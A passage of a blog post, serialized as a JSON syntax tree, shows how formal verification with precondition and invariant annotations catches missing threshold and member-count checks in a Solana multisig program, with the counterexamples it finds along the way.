0\n",{"type":25,"tag":216,"props":28238,"children":28239},{"class":6922,"line":7005},[28240],{"type":25,"tag":216,"props":28241,"children":28242},{"style":6964},[28243],{"type":31,"value":24218},{"type":25,"tag":216,"props":28245,"children":28246},{"class":6922,"line":7110},[28247,28251,28255,28259,28263,28267,28271,28275],{"type":25,"tag":216,"props":28248,"children":28249},{"style":6936},[28250],{"type":31,"value":17647},{"type":25,"tag":216,"props":28252,"children":28253},{"style":6936},[28254],{"type":31,"value":17652},{"type":25,"tag":216,"props":28256,"children":28257},{"style":7047},[28258],{"type":31,"value":11064},{"type":25,"tag":216,"props":28260,"children":28261},{"style":6964},[28262],{"type":31,"value":1850},{"type":25,"tag":216,"props":28264,"children":28265},{"style":6953},[28266],{"type":31,"value":13547},{"type":25,"tag":216,"props":28268,"children":28269},{"style":6964},[28270],{"type":31,"value":27946},{"type":25,"tag":216,"props":28272,"children":28273},{"style":6953},[28274],{"type":31,"value":13547},{"type":25,"tag":216,"props":28276,"children":28277},{"style":6964},[28278],{"type":31,"value":13552},{"type":25,"tag":38,"props":28280,"children":28281},{},[28282],{"type":31,"value":28283},"A third counterexample:",{"type":25,"tag":206,"props":28285,"children":28287},{"code":28286},"threshold: 4\ncreate_key: ...\nmembers: SparseVec { size: 536870920 }\n",[28288],{"type":25,"tag":82,"props":28289,"children":28290},{"__ignoreMap":7},[28291],{"type":31,"value":28286},{"type":25,"tag":38,"props":28293,"children":28294},{},[28295,28297,28303],{"type":31,"value":28296},"Here we see the size of our ",{"type":25,"tag":82,"props":28298,"children":28300},{"className":28299},[],[28301],{"type":31,"value":28302},"members",{"type":31,"value":28304}," vec is huge! We need to constrain that to be less than u16::MAX:",{"type":25,"tag":206,"props":28306,"children":28308},{"code":28307,"language":6914,"meta":7,"className":6915,"style":7},"#[succeeds_if(\n    (threshold as usize) \u003C= members.len()\n    && (threshold != 0)\n    && (members.len() \u003C= (u16::MAX as usize))\n)]\npub fn create(...) { ... }\n",[28309],{"type":25,"tag":82,"props":28310,"children":28311},{"__ignoreMap":7},[28312,28319,28354,28375,28427,28434],{"type":25,"tag":216,"props":28313,"children":28314},{"class":6922,"line":6923},[28315],{"type":25,"tag":216,"props":28316,"children":28317},{"style":6964},[28318],{"type":31,"value":28069},{"type":25,"tag":216,"props":28320,"children":28321},{"class":6922,"line":6769},[28322,28326,28330,28334,28338,28342,28346,28350],{"type":25,"tag":216,"props":28323,"children":28324},{"style":6964},[28325],{"type":31,"value":28077},{"type":25,"tag":216,"props":28327,"children":28328},{"style":6936},[28329],{"type":31,"value":12795},{"type":25,"tag":216,"props":28331,"children":28332},{"style":7375},[28333],{"type":31,"value":17688},{"type":25,"tag":216,"props":28335,"children":28336},{"style":6964},[28337],{"type":31,"value":7036},{"type":25,"tag":216,"props":28339,"children":28340},{"style":6953},[28341],{"type":31,"value":23374},{"type":25,"tag":216,"props":28343,"children":28344},{"style":6964},[28345],{"type":31,"value":27330},{"type":25,"tag":216,"props":28347,"children":28348},{"style":6953},[28349],{"type":31,"value":179},{"type":25,"tag":216,"props":28351,"children":28352},{"style":6964},[28353],{"type":31,"value":28106},{"type":25,"tag":216,"props":28355,"children":28356},{"class":6922,"line":6778},[28357,28361,28366,28370],{"type":25,"tag":216,"props":28358,"children":28359},{"style":6953},[28360],{"type":31,"value":19579},{"type":25,"tag":216,"props":28362,"children":28363},{"style":6964},[28364],{"type":31,"value":28365}," (threshold ",{"type":25,"tag":216,"props":28367,"children":28368},{"style":6953},[28369],{"type":31,"value":19646},{"type":25,"tag":216,"props":28371,"children":28372},{"style":6964},[28373],{"type":31,"value":28374}," 0)\n",{"type":25,"tag":216,"props":28376,"children":28377},{"class":6922,"line":7005},[28378,28382,28386,28390,28394,28398,28402,28407,28411,28415,28419,28423],{"type":25,"tag":216,"props":28379,"children":28380},{"style":6953},[28381],{"type":31,"value":19579},{"type":25,"tag":216,"props":28383,"children":28384},{"style":6964},[28385],{"type":31,"value":26944},{"type":25,"tag":216,"props":28387,"children":28388},{"style":6953},[28389],{"type":31,"value":179},{"type":25,"tag":216,"props":28391,"children":28392},{"style":6964},[28393],{"type":31,"value":24981},{"type":25,"tag":216,"props":28395,"children":28396},{"style":6953},[28397],{"type":31,"value":23374},{"type":25,"tag":216,"props":28399,"children":28400},{"style":6964},[28401],{"type":31,"value":7016},{"type":25,"tag":216,"props":28403,"children":28404},{"style":7375},[28405],{"type":31,"value":28406},"u16",{"type":25,"tag":216,"props":28408,"children":28409},{"style":6953},[28410],{"type":31,"value":7438},{"type":25,"tag":216,"props":28412,"children":28413},{"style":7375},[28414],{"type":31,"value":24999},{"type":25,"tag":216,"props":28416,"children":28417},{"style":6936},[28418],{"type":31,"value":12781},{"type":25,"tag":216,"props":28420,"children":28421},{"style":7375},[28422],{"type":31,"value":17688},{"type":25,"tag":216,"props":28424,"children":28425},{"style":6964},[28426],{"type":31,"value":23672},{"type":25,"tag":216,"props":28428,"children":28429},{"class":6922,"line":7110},[28430],{"type":25,"tag":216,"props":28431,"children":28432},{"style":6964},[28433],{"type":31,"value":24218},{"type":25,"tag":216,"props":28435,"children":28436},{"class":6922,"line":7216},[28437,28441,28445,28449,28453,28457,28461,28465],{"type":25,"tag":216,"props":28438,"children":28439},{"style":6936},[28440],{"type":31,"value":17647},{"type":25,"tag":216,"props":28442,"children":28443},{"style":6936},[28444],{"type":31,"value":17652},{"type":25,"tag":216,"props":28446,"children":28447},{"style":7047},[28448],{"type":31,"value":11064},{"type":25,"tag":216,"props":28450,"children":28451},{"style":6964},[28452],{"type":31,"value":1850},{"type":25,"tag":216,"props":28454,"children":28455},{"style":6953},[28456],{"type":31,"value":13547},{"type":25,"tag":216,"props":28458,"children":28459},{"style":6964},[28460],{"type":31,"value":27946},{"type":25,"tag":216,"props":28462,"children":28463},{"style":6953},[28464],{"type":31,"value":13547},{"type":25,"tag":216,"props":28466,"children":28467},{"style":6964},[28468],{"type":31,"value":13552},{"type":25,"tag":38,"props":28470,"children":28471},{},[28472],{"type":31,"value":28473},"And now we get:",{"type":25,"tag":206,"props":28475,"children":28477},{"code":28476},"VERIFICATION:- SUCCESSFUL\nVerification Time: 6.6634517s\n",[28478],{"type":25,"tag":82,"props":28479,"children":28480},{"__ignoreMap":7},[28481],{"type":31,"value":28476},{"type":25,"tag":38,"props":28483,"children":28484},{},[28485],{"type":31,"value":28486},"🥳🥳🥳",{"type":25,"tag":38,"props":28488,"children":28489},{},[28490],{"type":31,"value":28491},"The attentive reader may have noticed that we didn't need to verify this condition:",{"type":25,"tag":206,"props":28493,"children":28495},{"code":28494,"language":6914,"meta":7,"className":6915,"style":7},"if total_members \u003C 1 {\n    return err!(MsError::EmptyMembers);\n}\n",[28496],{"type":25,"tag":82,"props":28497,"children":28498},{"__ignoreMap":7},[28499,28522,28553],{"type":25,"tag":216,"props":28500,"children":28501},{"class":6922,"line":6923},[28502,28506,28510,28514,28518],{"type":25,"tag":216,"props":28503,"children":28504},{"style":6973},[28505],{"type":31,"value":19537},{"type":25,"tag":216,"props":28507,"children":28508},{"style":6947},[28509],{"type":31,"value":27409},{"type":25,"tag":216,"props":28511,"children":28512},{"style":6953},[28513],{"type":31,"value":12672},{"type":25,"tag":216,"props":28515,"children":28516},{"style":6989},[28517],{"type":31,"value":8471},{"type":25,"tag":216,"props":28519,"children":28520},{"style":6964},[28521],{"type":31,"value":7241},{"type":25,"tag":216,"props":28523,"children":28524},{"class":6922,"line":6769},[28525,28529,28533,28537,28541,28545,28549],{"type":25,"tag":216,"props":28526,"children":28527},{"style":6973},[28528],{"type":31,"value":20947},{"type":25,"tag":216,"props":28530,"children":28531},{"style":7047},[28532],{"type":31,"value":27465},{"type":25,"tag":216,"props":28534,"children":28535},{"style":6964},[28536],{"type":31,"value":1850},{"type":25,"tag":216,"props":28538,"children":28539},{"style":7375},[28540],{"type":31,"value":27474},{"type":25,"tag":216,"props":28542,"children":28543},{"style":6953},[28544],{"type":31,"value":7438},{"type":25,"tag":216,"props":28546,"children":28547},{"style":7375},[28548],{"type":31,"value":27483},{"type":25,"tag":216,"props":28550,"children":28551},{"style":6964},[28552],{"type":31,"value":7797},{"type":25,"tag":216,"props":28554,"children":28555},{"class":6922,"line":6778},[28556],{"type":25,"tag":216,"props":28557,"children":28558},{"style":6964},[28559],{"type":31,"value":7874},{"type":25,"tag":38,"props":28561,"children":28562},{},[28563,28565,28571,28573,28578,28580,28585,28587,28592],{"type":31,"value":28564},"In this case this is actually redundant because if ",{"type":25,"tag":82,"props":28566,"children":28568},{"className":28567},[],[28569],{"type":31,"value":28570},"members.len() == 0",{"type":31,"value":28572}," then our threshold would also have to be ",{"type":25,"tag":82,"props":28574,"children":28576},{"className":28575},[],[28577],{"type":31,"value":1882},{"type":31,"value":28579}," (and our ",{"type":25,"tag":82,"props":28581,"children":28583},{"className":28582},[],[28584],{"type":31,"value":26695},{"type":31,"value":28586}," is not allowed to be ",{"type":25,"tag":82,"props":28588,"children":28590},{"className":28589},[],[28591],{"type":31,"value":1882},{"type":31,"value":28593},"). The solver realizes that this situation is impossible and therefore the expression we have above is sufficient!",{"type":25,"tag":606,"props":28595,"children":28597},{"id":28596},"_2-verify-threshold-requirements",[28598],{"type":31,"value":28599},"2. Verify threshold requirements",{"type":25,"tag":38,"props":28601,"children":28602},{},[28603],{"type":31,"value":28604},"A critical security property for multisigs is that the threshold should never be zero (which would let anyone issue transactions) and the threshold should never be greater than the number of members (which would let nobody issue transactions).",{"type":25,"tag":38,"props":28606,"children":28607},{},[28608,28610,28614],{"type":31,"value":28609},"Unlike the previous example, we want to verify this in ",{"type":25,"tag":64,"props":28611,"children":28612},{},[28613],{"type":31,"value":13256},{"type":31,"value":28615}," cases. I.e. any instruction that could mutate the multisig account.",{"type":25,"tag":38,"props":28617,"children":28618},{},[28619,28621,28625,28627,28632],{"type":31,"value":28620},"In this case, we want to model this as an ",{"type":25,"tag":64,"props":28622,"children":28623},{},[28624],{"type":31,"value":25725},{"type":31,"value":28626}," on the ",{"type":25,"tag":82,"props":28628,"children":28630},{"className":28629},[],[28631],{"type":31,"value":26687},{"type":31,"value":28633}," account struct:",{"type":25,"tag":206,"props":28635,"children":28637},{"code":28636,"language":6914,"meta":7,"className":6915,"style":7},"#[account]\n#[derive(Clone, Debug)]\n#[invariant(\n    (self.threshold >= 1)\n    && (self.threshold as usize \u003C= self.keys.len())\n)]\npub struct Ms {\n    pub threshold: u16,               // threshold for signatures\n    pub authority_index: u16,         // index to seed other authorities under this multisig\n    pub transaction_index: u32,       // look up and seed reference for transactions\n    pub ms_change_index: u32,         // the last executed/closed transaction\n    pub bump: u8,                     // bump for the multisig seed\n    pub create_key: Pubkey,           // random key(or not) used to seed the multisig pda\n    pub allow_external_execute: bool, // allow non-member keys to execute txs\n    pub keys: Vec\u003CPubkey>,            // keys of the members\n}\n",[28638],{"type":25,"tag":82,"props":28639,"children":28640},{"__ignoreMap":7},[28641,28648,28673,28680,28704,28755,28762,28781,28808,28835,28862,28889,28916,28943,28970,29005],{"type":25,"tag":216,"props":28642,"children":28643},{"class":6922,"line":6923},[28644],{"type":25,"tag":216,"props":28645,"children":28646},{"style":6964},[28647],{"type":31,"value":24730},{"type":25,"tag":216,"props":28649,"children":28650},{"class":6922,"line":6769},[28651,28655,28660,28664,28669],{"type":25,"tag":216,"props":28652,"children":28653},{"style":6964},[28654],{"type":31,"value":26783},{"type":25,"tag":216,"props":28656,"children":28657},{"style":7375},[28658],{"type":31,"value":28659},"Clone",{"type":25,"tag":216,"props":28661,"children":28662},{"style":6964},[28663],{"type":31,"value":7026},{"type":25,"tag":216,"props":28665,"children":28666},{"style":7375},[28667],{"type":31,"value":28668},"Debug",{"type":25,"tag":216,"props":28670,"children":28671},{"style":6964},[28672],{"type":31,"value":24218},{"type":25,"tag":216,"props":28674,"children":28675},{"class":6922,"line":6778},[28676],{"type":25,"tag":216,"props":28677,"children":28678},{"style":6964},[28679],{"type":31,"value":24738},{"type":25,"tag":216,"props":28681,"children":28682},{"class":6922,"line":7005},[28683,28688,28692,28696,28700],{"type":25,"tag":216,"props":28684,"children":28685},{"style":6964},[28686],{"type":31,"value":28687},"    (self",{"type":25,"tag":216,"props":28689,"children":28690},{"style":6953},[28691],{"type":31,"value":179},{"type":25,"tag":216,"props":28693,"children":28694},{"style":6964},[28695],{"type":31,"value":25031},{"type":25,"tag":216,"props":28697,"children":28698},{"style":6953},[28699],{"type":31,"value":13900},{"type":25,"tag":216,"props":28701,"children":28702},{"style":6964},[28703],{"type":31,"value":25040},{"type":25,"tag":216,"props":28705,"children":28706},{"class":6922,"line":7110},[28707,28711,28715,28719,28723,28727,28731,28735,28739,28743,28747,28751],{"type":25,"tag":216,"props":28708,"children":28709},{"style":6953},[28710],{"type":31,"value":19579},{"type":25,"tag":216,"props":28712,"children":28713},{"style":6964},[28714],{"type":31,"value":24964},{"type":25,"tag":216,"props":28716,"children":28717},{"style":6953},[28718],{"type":31,"value":179},{"type":25,"tag":216,"props":28720,"children":28721},{"style":6964},[28722],{"type":31,"value":25031},{"type":25,"tag":216,"props":28724,"children":28725},{"style":6936},[28726],{"type":31,"value":12795},{"type":25,"tag":216,"props":28728,"children":28729},{"style":7375},[28730],{"type":31,"value":17688},{"type":25,"tag":216,"props":28732,"children":28733},{"style":6953},[28734],{"type":31,"value":12149},{"type":25,"tag":216,"props":28736,"children":28737},{"style":6964},[28738],{"type":31,"value":17754},{"type":25,"tag":216,"props":28740,"children":28741},{"style":6953},[28742],{"type":31,"value":179},{"type":25,"tag":216,"props":28744,"children":28745},{"style":6964},[28746],{"type":31,"value":24943},{"type":25,"tag":216,"props":28748,"children":28749},{"style":6953},[28750],{"type":31,"value":179},{"type":25,"tag":216,"props":28752,"children":28753},{"style":6964},[28754],{"type":31,"value":25092},{"type":25,"tag":216,"props":28756,"children":28757},{"class":6922,"line":7216},[28758],{"type":25,"tag":216,"props":28759,"children":28760},{"style":6964},[28761],{"type":31,"value":24218},{"type":25,"tag":216,"props":28763,"children":28764},{"class":6922,"line":7244},[28765,28769,28773,28777],{"type":25,"tag":216,"props":28766,"children":28767},{"style":6936},[28768],{"type":31,"value":17647},{"type":25,"tag":216,"props":28770,"children":28771},{"style":6936},[28772],{"type":31,"value":25111},{"type":25,"tag":216,"props":28774,"children":28775},{"style":7375},[28776],{"type":31,"value":25116},{"type":25,"tag":216,"props":28778,"children":28779},{"style":6964},[28780],{"type":31,"value":7241},{"type":25,"tag":216,"props":28782,"children":28783},{"class":6922,"line":7257},[28784,28788,28792,28796,28800,28804],{"type":25,"tag":216,"props":28785,"children":28786},{"style":6936},[28787],{"type":31,"value":24803},{"type":25,"tag":216,"props":28789,"children":28790},{"style":6947},[28791],{"type":31,"value":25132},{"type":25,"tag":216,"props":28793,"children":28794},{"style":6953},[28795],{"type":31,"value":1472},{"type":25,"tag":216,"props":28797,"children":28798},{"style":7375},[28799],{"type":31,"value":24990},{"type":25,"tag":216,"props":28801,"children":28802},{"style":6964},[28803],{"type":31,"value":25145},{"type":25,"tag":216,"props":28805,"children":28806},{"style":6927},[28807],{"type":31,"value":25150},{"type":25,"tag":216,"props":28809,"children":28810},{"class":6922,"line":7275},[28811,28815,28819,28823,28827,28831],{"type":25,"tag":216,"props":28812,"children":28813},{"style":6936},[28814],{"type":31,"value":24803},{"type":25,"tag":216,"props":28816,"children":28817},{"style":6947},[28818],{"type":31,"value":25162},{"type":25,"tag":216,"props":28820,"children":28821},{"style":6953},[28822],{"type":31,"value":1472},{"type":25,"tag":216,"props":28824,"children":28825},{"style":7375},[28826],{"type":31,"value":24990},{"type":25,"tag":216,"props":28828,"children":28829},{"style":6964},[28830],{"type":31,"value":25175},{"type":25,"tag":216,"props":28832,"children":28833},{"style":6927},[28834],{"type":31,"value":25180},{"type":25,"tag":216,"props":28836,"children":28837},{"class":6922,"line":7296},[28838,28842,28846,28850,28854,28858],{"type":25,"tag":216,"props":28839,"children":28840},{"style":6936},[28841],{"type":31,"value":24803},{"type":25,"tag":216,"props":28843,"children":28844},{"style":6947},[28845],{"type":31,"value":25192},{"type":25,"tag":216,"props":28847,"children":28848},{"style":6953},[28849],{"type":31,"value":1472},{"type":25,"tag":216,"props":28851,"children":28852},{"style":7375},[28853],{"type":31,"value":21507},{"type":25,"tag":216,"props":28855,"children":28856},{"style":6964},[28857],{"type":31,"value":25205},{"type":25,"tag":216,"props":28859,"children":28860},{"style":6927},[28861],{"type":31,"value":25210},{"type":25,"tag":216,"props":28863,"children":28864},{"class":6922,"line":7305},[28865,28869,28873,28877,28881,28885],{"type":25,"tag":216,"props":28866,"children":28867},{"style":6936},[28868],{"type":31,"value":24803},{"type":25,"tag":216,"props":28870,"children":28871},{"style":6947},[28872],{"type":31,"value":25222},{"type":25,"tag":216,"props":28874,"children":28875},{"style":6953},[28876],{"type":31,"value":1472},{"type":25,"tag":216,"props":28878,"children":28879},{"style":7375},[28880],{"type":31,"value":21507},{"type":25,"tag":216,"props":28882,"children":28883},{"style":6964},[28884],{"type":31,"value":25175},{"type":25,"tag":216,"props":28886,"children":28887},{"style":6927},[28888],{"type":31,"value":25239},{"type":25,"tag":216,"props":28890,"children":28891},{"class":6922,"line":7557},[28892,28896,28900,28904,28908,28912],{"type":25,"tag":216,"props":28893,"children":28894},{"style":6936},[28895],{"type":31,"value":24803},{"type":25,"tag":216,"props":28897,"children":28898},{"style":6947},[28899],{"type":31,"value":25251},{"type":25,"tag":216,"props":28901,"children":28902},{"style":6953},[28903],{"type":31,"value":1472},{"type":25,"tag":216,"props":28905,"children":28906},{"style":7375},[28907],{"type":31,"value":18591},{"type":25,"tag":216,"props":28909,"children":28910},{"style":6964},[28911],{"type":31,"value":25264},{"type":25,"tag":216,"props":28913,"children":28914},{"style":6927},[28915],{"type":31,"value":25269},{"type":25,"tag":216,"props":28917,"children":28918},{"class":6922,"line":7574},[28919,28923,28927,28931,28935,28939],{"type":25,"tag":216,"props":28920,"children":28921},{"style":6936},[28922],{"type":31,"value":24803},{"type":25,"tag":216,"props":28924,"children":28925},{"style":6947},[28926],{"type":31,"value":25281},{"type":25,"tag":216,"props":28928,"children":28929},{"style":6953},[28930],{"type":31,"value":1472},{"type":25,"tag":216,"props":28932,"children":28933},{"style":7375},[28934],{"type":31,"value":24817},{"type":25,"tag":216,"props":28936,"children":28937},{"style":6964},[28938],{"type":31,"value":25294},{"type":25,"tag":216,"props":28940,"children":28941},{"style":6927},[28942],{"type":31,"value":25299},{"type":25,"tag":216,"props":28944,"children":28945},{"class":6922,"line":7591},[28946,28950,28954,28958,28962,28966],{"type":25,"tag":216,"props":28947,"children":28948},{"style":6936},[28949],{"type":31,"value":24803},{"type":25,"tag":216,"props":28951,"children":28952},{"style":6947},[28953],{"type":31,"value":25311},{"type":25,"tag":216,"props":28955,"children":28956},{"style":6953},[28957],{"type":31,"value":1472},{"type":25,"tag":216,"props":28959,"children":28960},{"style":7375},[28961],{"type":31,"value":16006},{"type":25,"tag":216,"props":28963,"children":28964},{"style":6964},[28965],{"type":31,"value":7026},{"type":25,"tag":216,"props":28967,"children":28968},{"style":6927},[28969],{"type":31,"value":25328},{"type":25,"tag":216,"props":28971,"children":28972},{"class":6922,"line":7604},[28973,28977,28981,28985,28989,28993,28997,29001],{"type":25,"tag":216,"props":28974,"children":28975},{"style":6936},[28976],{"type":31,"value":24803},{"type":25,"tag":216,"props":28978,"children":28979},{"style":6947},[28980],{"type":31,"value":25340},{"type":25,"tag":216,"props":28982,"children":28983},{"style":6953},[28984],{"type":31,"value":1472},{"type":25,"tag":216,"props":28986,"children":28987},{"style":7375},[28988],{"type":31,"value":25349},{"type":25,"tag":216,"props":28990,"children":28991},{"style":6964},[28992],{"type":31,"value":9757},{"type":25,"tag":216,"props":28994,"children":28995},{"style":7375},[28996],{"type":31,"value":25358},{"type":25,"tag":216,"props":28998,"children":28999},{"style":6964},[29000],{"type":31,"value":25363},{"type":25,"tag":216,"props":29002,"children":29003},{"style":6927},[29004],{"type":31,"value":25368},{"type":25,"tag":216,"props":29006,"children":29007},{"class":6922,"line":7613},[29008],{"type":25,"tag":216,"props":29009,"children":29010},{"style":6964},[29011],{"type":31,"value":7874},{"type":25,"tag":38,"props":29013,"children":29014},{},[29015,29017,29022],{"type":31,"value":29016},"Our verification framework will generate an invariant harness for each instruction. Instructions that can potentially modify the ",{"type":25,"tag":82,"props":29018,"children":29020},{"className":29019},[],[29021],{"type":31,"value":26687},{"type":31,"value":29023}," object will be checked to ensure that the invariant still holds after modification.",{"type":25,"tag":38,"props":29025,"children":29026},{},[29027,29029,29034],{"type":31,"value":29028},"Let's try this on the ",{"type":25,"tag":82,"props":29030,"children":29032},{"className":29031},[],[29033],{"type":31,"value":26766},{"type":31,"value":29035}," instruction that we've already seen:",{"type":25,"tag":206,"props":29037,"children":29039},{"code":29038},"VERIFICATION:- SUCCESSFUL\nVerification Time: 6.8006988s\n",[29040],{"type":25,"tag":82,"props":29041,"children":29042},{"__ignoreMap":7},[29043],{"type":31,"value":29038},{"type":25,"tag":38,"props":29045,"children":29046},{},[29047,29049,29054],{"type":31,"value":29048},"To ensure this is working, we can test by commenting out this check from ",{"type":25,"tag":82,"props":29050,"children":29052},{"className":29051},[],[29053],{"type":31,"value":26766},{"type":31,"value":1472},{"type":25,"tag":206,"props":29056,"children":29058},{"code":29057,"language":6914,"meta":7,"className":6915,"style":7},"// if usize::from(threshold) \u003C 1 || usize::from(threshold) > total_members {\n//     return err!(MsError::InvalidThreshold);\n// }\n",[29059],{"type":25,"tag":82,"props":29060,"children":29061},{"__ignoreMap":7},[29062,29070,29078],{"type":25,"tag":216,"props":29063,"children":29064},{"class":6922,"line":6923},[29065],{"type":25,"tag":216,"props":29066,"children":29067},{"style":6927},[29068],{"type":31,"value":29069},"// if usize::from(threshold) \u003C 1 || usize::from(threshold) > total_members {\n",{"type":25,"tag":216,"props":29071,"children":29072},{"class":6922,"line":6769},[29073],{"type":25,"tag":216,"props":29074,"children":29075},{"style":6927},[29076],{"type":31,"value":29077},"//     return err!(MsError::InvalidThreshold);\n",{"type":25,"tag":216,"props":29079,"children":29080},{"class":6922,"line":6778},[29081],{"type":25,"tag":216,"props":29082,"children":29083},{"style":6927},[29084],{"type":31,"value":29085},"// }\n",{"type":25,"tag":38,"props":29087,"children":29088},{},[29089],{"type":31,"value":29090},"And run again:",{"type":25,"tag":206,"props":29092,"children":29094},{"code":29093},"VERIFICATION:- FAILED\nVerification Time: 8.245743s\n",[29095],{"type":25,"tag":82,"props":29096,"children":29097},{"__ignoreMap":7},[29098],{"type":31,"value":29093},{"type":25,"tag":38,"props":29100,"children":29101},{},[29102],{"type":31,"value":29103},"We get the following counterexample:",{"type":25,"tag":206,"props":29105,"children":29107},{"code":29106,"language":6914,"meta":7,"className":6915,"style":7},"Account {\n    account: Ms {\n        threshold: 32768,\n        authority_index: 1,\n        transaction_index: 0,\n        ms_change_index: 0,\n        bump: 0,\n        create_key: ...,\n        allow_external_execute: false,\n        keys: SparseVec {\n            size: 5112,\n        },\n    },\n    info: AccountInfo { ... },\n}\n",[29108],{"type":25,"tag":82,"props":29109,"children":29110},{"__ignoreMap":7},[29111,29122,29142,29162,29182,29202,29222,29242,29262,29282,29303,29324,29332,29340,29370],{"type":25,"tag":216,"props":29112,"children":29113},{"class":6922,"line":6923},[29114,29118],{"type":25,"tag":216,"props":29115,"children":29116},{"style":7375},[29117],{"type":31,"value":21104},{"type":25,"tag":216,"props":29119,"children":29120},{"style":6964},[29121],{"type":31,"value":7241},{"type":25,"tag":216,"props":29123,"children":29124},{"class":6922,"line":6769},[29125,29130,29134,29138],{"type":25,"tag":216,"props":29126,"children":29127},{"style":6947},[29128],{"type":31,"value":29129},"    account",{"type":25,"tag":216,"props":29131,"children":29132},{"style":6953},[29133],{"type":31,"value":1472},{"type":25,"tag":216,"props":29135,"children":29136},{"style":7375},[29137],{"type":31,"value":25116},{"type":25,"tag":216,"props":29139,"children":29140},{"style":6964},[29141],{"type":31,"value":7241},{"type":25,"tag":216,"props":29143,"children":29144},{"class":6922,"line":6778},[29145,29149,29153,29158],{"type":25,"tag":216,"props":29146,"children":29147},{"style":6947},[29148],{"type":31,"value":27783},{"type":25,"tag":216,"props":29150,"children":29151},{"style":6953},[29152],{"type":31,"value":1472},{"type":25,"tag":216,"props":29154,"children":29155},{"style":6989},[29156],{"type":31,"value":29157}," 32768",{"type":25,"tag":216,"props":29159,"children":29160},{"style":6964},[29161],{"type":31,"value":7465},{"type":25,"tag":216,"props":29163,"children":29164},{"class":6922,"line":7005},[29165,29170,29174,29178],{"type":25,"tag":216,"props":29166,"children":29167},{"style":6947},[29168],{"type":31,"value":29169},"        authority_index",{"type":25,"tag":216,"props":29171,"children":29172},{"style":6953},[29173],{"type":31,"value":1472},{"type":25,"tag":216,"props":29175,"children":29176},{"style":6989},[29177],{"type":31,"value":8471},{"type":25,"tag":216,"props":29179,"children":29180},{"style":6964},[29181],{"type":31,"value":7465},{"type":25,"tag":216,"props":29183,"children":29184},{"class":6922,"line":7110},[29185,29190,29194,29198],{"type":25,"tag":216,"props":29186,"children":29187},{"style":6947},[29188],{"type":31,"value":29189},"        transaction_index",{"type":25,"tag":216,"props":29191,"children":29192},{"style":6953},[29193],{"type":31,"value":1472},{"type":25,"tag":216,"props":29195,"children":29196},{"style":6989},[29197],{"type":31,"value":6992},{"type":25,"tag":216,"props":29199,"children":29200},{"style":6964},[29201],{"type":31,"value":7465},{"type":25,"tag":216,"props":29203,"children":29204},{"class":6922,"line":7216},[29205,29210,29214,29218],{"type":25,"tag":216,"props":29206,"children":29207},{"style":6947},[29208],{"type":31,"value":29209},"        ms_change_index",{"type":25,"tag":216,"props":29211,"children":29212},{"style":6953},[29213],{"type":31,"value":1472},{"type":25,"tag":216,"props":29215,"children":29216},{"style":6989},[29217],{"type":31,"value":6992},{"type":25,"tag":216,"props":29219,"children":29220},{"style":6964},[29221],{"type":31,"value":7465},{"type":25,"tag":216,"props":29223,"children":29224},{"class":6922,"line":7244},[29225,29230,29234,29238],{"type":25,"tag":216,"props":29226,"children":29227},{"style":6947},[29228],{"type":31,"value":29229},"        bump",{"type":25,"tag":216,"props":29231,"children":29232},{"style":6953},[29233],{"type":31,"value":1472},{"type":25,"tag":216,"props":29235,"children":29236},{"style":6989},[29237],{"type":31,"value":6992},{"type":25,"tag":216,"props":29239,"children":29240},{"style":6964},[29241],{"type":31,"value":7465},{"type":25,"tag":216,"props":29243,"children":29244},{"class":6922,"line":7257},[29245,29249,29253,29258],{"type":25,"tag":216,"props":29246,"children":29247},{"style":6947},[29248],{"type":31,"value":27796},{"type":25,"tag":216,"props":29250,"children":29251},{"style":6953},[29252],{"type":31,"value":1472},{"type":25,"tag":216,"props":29254,"children":29255},{"style":6953},[29256],{"type":31,"value":29257}," ...",{"type":25,"tag":216,"props":29259,"children":29260},{"style":6964},[29261],{"type":31,"value":7465},{"type":25,"tag":216,"props":29263,"children":29264},{"class":6922,"line":7275},[29265,29270,29274,29278],{"type":25,"tag":216,"props":29266,"children":29267},{"style":6947},[29268],{"type":31,"value":29269},"        allow_external_execute",{"type":25,"tag":216,"props":29271,"children":29272},{"style":6953},[29273],{"type":31,"value":1472},{"type":25,"tag":216,"props":29275,"children":29276},{"style":6936},[29277],{"type":31,"value":13012},{"type":25,"tag":216,"props":29279,"children":29280},{"style":6964},[29281],{"type":31,"value":7465},{"type":25,"tag":216,"props":29283,"children":29284},{"class":6922,"line":7296},[29285,29290,29294,29299],{"type":25,"tag":216,"props":29286,"children":29287},{"style":6947},[29288],{"type":31,"value":29289},"        keys",{"type":25,"tag":216,"props":29291,"children":29292},{"style":6953},[29293],{"type":31,"value":1472},{"type":25,"tag":216,"props":29295,"children":29296},{"style":7375},[29297],{"type":31,"value":29298}," SparseVec",{"type":25,"tag":216,"props":29300,"children":29301},{"style":6964},[29302],{"type":31,"value":7241},{"type":25,"tag":216,"props":29304,"children":29305},{"class":6922,"line":7305},[29306,29311,29315,29320],{"type":25,"tag":216,"props":29307,"children":29308},{"style":6947},[29309],{"type":31,"value":29310},"            size",{"type":25,"tag":216,"props":29312,"children":29313},{"style":6953},[29314],{"type":31,"value":1472},{"type":25,"tag":216,"props":29316,"children":29317},{"style":6989},[29318],{"type":31,"value":29319}," 5112",{"type":25,"tag":216,"props":29321,"children":29322},{"style":6964},[29323],{"type":31,"value":7465},{"type":25,"tag":216,"props":29325,"children":29326},{"class":6922,"line":7557},[29327],{"type":25,"tag":216,"props":29328,"children":29329},{"style":6964},[29330],{"type":31,"value":29331},"        },\n",{"type":25,"tag":216,"props":29333,"children":29334},{"class":6922,"line":7574},[29335],{"type":25,"tag":216,"props":29336,"children":29337},{"style":6964},[29338],{"type":31,"value":29339},"    },\n",{"type":25,"tag":216,"props":29341,"children":29342},{"class":6922,"line":7591},[29343,29348,29352,29357,29361,29365],{"type":25,"tag":216,"props":29344,"children":29345},{"style":6947},[29346],{"type":31,"value":29347},"    info",{"type":25,"tag":216,"props":29349,"children":29350},{"style":6953},[29351],{"type":31,"value":1472},{"type":25,"tag":216,"props":29353,"children":29354},{"style":7375},[29355],{"type":31,"value":29356}," AccountInfo",{"type":25,"tag":216,"props":29358,"children":29359},{"style":6964},[29360],{"type":31,"value":13542},{"type":25,"tag":216,"props":29362,"children":29363},{"style":6953},[29364],{"type":31,"value":13547},{"type":25,"tag":216,"props":29366,"children":29367},{"style":6964},[29368],{"type":31,"value":29369}," 